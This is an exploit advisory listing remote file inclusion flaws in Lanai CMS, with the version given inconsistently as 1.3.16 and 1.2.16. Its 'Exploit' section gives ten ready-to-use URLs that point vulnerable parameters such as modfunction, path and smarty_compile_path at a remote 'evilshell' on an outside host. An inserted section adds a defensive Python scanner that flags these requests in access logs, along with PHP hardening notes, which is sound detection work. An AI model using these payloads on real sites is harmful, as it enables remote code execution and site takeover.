Lanai CMS version 1.3.16 suffers from remote file inclusion vulnerabilities.
abca33cc1740c10f459647dcd24b67c0c55075b5566e3dfd01b5d464058a0a5b
Lanai cms_v1.2.16 Content Management System Remote File Inclusion
----------------------------------------------------------------------------------------------------------|
Download: http://downloads.sourceforge.net/la-nai/lanai-cms_v1.2.16.tar.gz?modtime=1188204187&big_mirror=0|
----------------------------------------------------------------------------------------------------------|
-------|
Exploit|
-------|
http://site.com/adodb.inc.php?path=http://host.com/evilshell?
http://site.com/adodb.inc.php?file=http://host.com/evilshell?
http://site.com/Smarty.class.php?smarty_compile_path=http://host.com/evilshell?
http://site.com/index.php?modfunction=http://host.com/evilshell?
http://site.com/send.php?modfunction=http://host.com/evilshell?
http://site.com/checkoutconfirm.php?modfunction=http://host.com/evilshell?
http://site.com/checkoutsave.php?modfunction=http://host.com/evilshell?
http://site.com/prodview.php?modfunction=http://host.com/evilshell?
http://site.com/faqviewgroup.php?modfunction=http://host.com/evilshell?
http://site.com/xml_domit_rss_shared.php?pathToLibrary=http://host.com/evilshell?
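Added example, not part of the original advisory: a Python check that scans web server access logs for requests in which one of the script/parameter pairs listed above carries a URL as its value. The combined log format, the sample lines, and the names find_rfi_attempts and SAMPLE_LOG are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Script -> parameter pairs taken from the advisory's Exploit list.
RFI_PARAMS = {
    "adodb.inc.php": {"path", "file"},
    "Smarty.class.php": {"smarty_compile_path"},
    "index.php": {"modfunction"},
    "send.php": {"modfunction"},
    "checkoutconfirm.php": {"modfunction"},
    "checkoutsave.php": {"modfunction"},
    "prodview.php": {"modfunction"},
    "faqviewgroup.php": {"modfunction"},
    "xml_domit_rss_shared.php": {"pathToLibrary"},
}
# Value starts with scheme:// or a protocol-relative //, i.e. a URL, not a plain name.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def find_rfi_attempts(log_lines):
    """Return (line_no, script, param, value) for each suspicious request."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1]
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in RFI_PARAMS.get(script, ()) and REMOTE.match(value):
                hits.append((n, script, name, value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php?modfunction=news HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:01:05 +0000] "GET /index.php?modfunction=http://host.example/x? HTTP/1.0" 200 731',
    '203.0.113.9 - - [01/Jan/2024:10:01:06 +0000] "GET /lib/adodb.inc.php?path=http%3A%2F%2Fhost.example%2Fx%3F HTTP/1.0" 200 0',
    '198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /prodview.php?id=5&ref=http://example.org/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit on any of these scripts is also a prompt to check whether the file is reachable directly from the web root and whether PHP's allow_url_include and allow_url_fopen settings are enabled on that host.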
-----------------|
Timeline:10.11.07|
-----------------|
------|
Author|
------|
fl0 fl0w
e-mail:flo[underscore]flow[underscore]supremacy[at]yahoo[dot]com
site:http://fl0-fl0w.docspages.com
A renslt.org team member ..."we're not the only ones but we're the best"